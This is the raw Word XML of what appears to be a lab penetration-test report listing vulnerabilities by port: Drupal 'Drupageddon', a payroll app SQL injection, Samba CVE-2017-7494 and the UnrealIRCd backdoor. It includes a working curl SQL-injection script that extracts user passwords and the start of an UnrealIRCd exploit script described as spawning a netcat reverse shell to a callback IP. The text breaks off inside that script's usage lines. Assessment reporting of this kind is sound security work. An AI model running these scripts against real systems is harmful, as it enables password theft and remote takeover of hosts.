    <w:p w14:paraId="5F3F8E32" w14:textId="307E5A16" w:rsidR="00BA2A73" w:rsidRPr="00BA2A73" w:rsidRDefault="00BA2A73" w:rsidP="00BA2A73">
      <w:r>
        <w:t xml:space="preserve">This port is running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UnrealIRC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server version 3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3470A84A" w14:textId="1CE5BBC6" w:rsidR="00D43835" w:rsidRDefault="00D43835" w:rsidP="00BA2A73">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B65337" w14:textId="10866270" w:rsidR="006B333A" w:rsidRDefault="00CB19DD" w:rsidP="00EC79C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc49374296"/>
      <w:bookmarkStart w:id="17" w:name="_Toc49378184"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0E7B0FDF" w14:textId="2201A134" w:rsidR="00EC79C0" w:rsidRPr="00EC79C0" w:rsidRDefault="00EC79C0" w:rsidP="00EC79C0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc49378185"/>
      <w:r>
        <w:t>Port 80</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5784EEC3" w14:textId="55909EE9" w:rsidR="00F2489E" w:rsidRDefault="00E6595B" w:rsidP="00EC79C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc49374297"/>
      <w:bookmarkStart w:id="20" w:name="_Toc49378186"/>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00233020">
        <w:t>rupal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2E860969" w14:textId="4D580389" w:rsidR="00233020" w:rsidRDefault="00023819" w:rsidP="00233020">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Core versions 7.x &lt; 7.32 are vulnerable to </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00241C3C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2014-3704</w:t>
        </w:r>
        <w:r w:rsidR="00241C3C" w:rsidRPr="00241C3C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> SQL Injection “</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00241C3C" w:rsidRPr="00241C3C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Drupageddon</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00241C3C" w:rsidRPr="00241C3C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>”</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="448C9010" w14:textId="151DE17A" w:rsidR="00AF5782" w:rsidRDefault="00AF5782" w:rsidP="00233020">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00AF5782">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploit module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is available for this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FCFCD" w14:textId="039BAE88" w:rsidR="00A02963" w:rsidRDefault="00A02963" w:rsidP="00233020">
      <w:r>
        <w:t>MSF exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B7604" w14:textId="64130E35" w:rsidR="00624BEE" w:rsidRDefault="004C49C2" w:rsidP="00233020">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BB2EF8C" wp14:editId="510F96EC">
            <wp:extent cx="5795284" cy="3665551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865" cy="39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BEE">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00131569" w14:textId="0F54AA4F" w:rsidR="00233020" w:rsidRDefault="007451F9" w:rsidP="00EC79C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc49374298"/>
      <w:bookmarkStart w:id="22" w:name="_Toc49378187"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Payrollapp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E165D5F" w14:textId="5F767127" w:rsidR="00BB143D" w:rsidRDefault="00BB143D" w:rsidP="00BB143D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Payrollapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is vulnerable to an SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDFCC7E" w14:textId="4036D18A" w:rsidR="00BB143D" w:rsidRDefault="00BB143D" w:rsidP="00BB143D">
      <w:r>
        <w:t xml:space="preserve">Manual </w:t>
      </w:r>
      <w:r w:rsidR="00A02963">
        <w:t>SQLI in browser</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F15814" w14:textId="181E5DB3" w:rsidR="00BB143D" w:rsidRDefault="00BB143D" w:rsidP="00BB143D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6343391A" wp14:editId="2FA3AF00">
            <wp:extent cx="5727700" cy="3726241"/>
            <wp:effectExtent l="0" t="0" r="6350" b="762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99" cy="37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353" w14:textId="44FA753A" w:rsidR="00BB143D" w:rsidRDefault="00BB143D" w:rsidP="00BB143D">
      <w:r>
        <w:t>POC script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57701CFE" w14:textId="5CD14643" w:rsidR="00094A90" w:rsidRDefault="00094A90" w:rsidP="00BB143D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73BD6781" wp14:editId="00F4E8E3">
            <wp:extent cx="5727763" cy="3061252"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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109" cy="31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65D65B" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRDefault="00BB143D" w:rsidP="00A87C88">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8D50B" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41CCDE" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395D35E1" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t># Author: Mason Soroka-Gill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E8D709" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E51C8" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t># This script can be used to make unauthorized queries to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E43382" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve"># database behind any unpatched instance of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>payroll_app.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D98D180" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA9FC15" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763890A3" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>if [ $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t># !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>= 1 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311A357" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    echo "Usage:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B430A1" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    echo "$0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>target_uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA32E1" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    echo "Example:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073EC9E4" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    echo "$0 http://10.25.100.24/payroll_app.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3F5BD" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74871931" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE5C37" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5684AE14" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>=$1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B171819" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000440F7" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>curl -X POST $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve"> --data "user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>nobody&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>=a'; select password from users where username='' OR ''='&amp;s=OK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EACC1D" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A87C88" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA64E74" w14:textId="13DD1E94" w:rsidR="006254C6" w:rsidRDefault="006254C6" w:rsidP="00A87C88">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="636DE967" w14:textId="2D577392" w:rsidR="00EC79C0" w:rsidRDefault="006254C6" w:rsidP="006254C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc49378188"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port 445</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="0EF97717" w14:textId="06147A4A" w:rsidR="006254C6" w:rsidRDefault="006254C6" w:rsidP="006254C6">
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is vulnerable to </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="006254C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2017-7494 Remote Code Execution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00923E97">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA42F8A" w14:textId="51C2936F" w:rsidR="00923E97" w:rsidRDefault="00923E97" w:rsidP="006254C6">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00923E97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploit module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is available for this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309EDEE5" w14:textId="5ABF5441" w:rsidR="00923E97" w:rsidRDefault="00E7001A" w:rsidP="006254C6">
      <w:r w:rsidRPr="00E7001A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ADD PROOF OF EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791026B0" w14:textId="7BA92F69" w:rsidR="00D66EEA" w:rsidRDefault="00D66EEA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="248CCA8E" w14:textId="72E19D87" w:rsidR="00D66EEA" w:rsidRDefault="006E5841" w:rsidP="006E5841">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc49378189"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port 6667 &amp; 6697</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="60DB6C06" w14:textId="5CCBFE1E" w:rsidR="009D5A42" w:rsidRDefault="0052608E" w:rsidP="0052608E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UnrealIRC</w:t>
      </w:r>
      <w:r w:rsidR="009D5A42">
        <w:t>D</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D5A42">
        <w:t xml:space="preserve"> version 3.2.8.1 is vulnerable to </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="009D5A42" w:rsidRPr="009D5A42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2010-2075</w:t>
        </w:r>
        <w:r w:rsidR="009D5A42" w:rsidRPr="009D5A42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Malicious Backdoor Arbitrary Command Execution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D5A42">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F34D4EE" w14:textId="3701008A" w:rsidR="0052608E" w:rsidRDefault="0052608E" w:rsidP="0052608E">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="0052608E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploit module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is available for this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E7F5B" w14:textId="1EE91C5E" w:rsidR="004A3F68" w:rsidRDefault="004A3F68" w:rsidP="0052608E">
      <w:r>
        <w:t>Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672C854" w14:textId="6B6719D0" w:rsidR="003437D2" w:rsidRDefault="003437D2" w:rsidP="0052608E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3269E906" wp14:editId="58007566">
            <wp:extent cx="5731510" cy="6080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2EA1" w14:textId="7555BB0C" w:rsidR="006C554E" w:rsidRDefault="006C554E" w:rsidP="0052608E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F5A05C" w14:textId="63F95E80" w:rsidR="00C66923" w:rsidRDefault="006C554E" w:rsidP="0052608E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B6F79" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76104DBE" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A837B97" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># CVE-2010-2075</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51293C93" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># Unreal IRC 3.2 Backdoor arbitrary command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605C2BF" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># https://www.exploit-db.com/exploits/13853</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CF015" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09630F2D" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># Author: Mason Soroka-Gill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849F801" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC2338" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> version adapted to spawn a reverse shell on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349FE18D" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CBFA0" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t># Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70626C" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#   This relies on the remote host having </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the system if this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>doesn't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E7CA878" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#   work, replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with telnet in the echo string or use another reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F57D843" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781065EB" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2822D192" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if [ $# -ne </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4 ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACEA8C7" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "Usage:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452DB2DC" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "$0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target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>callback_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>callback_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533703A" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "Example:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21650D6E" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "$0 10.25.100.24 6667 10.25.100.23 7000"</w:t>
      </w:r>
    </w:p>
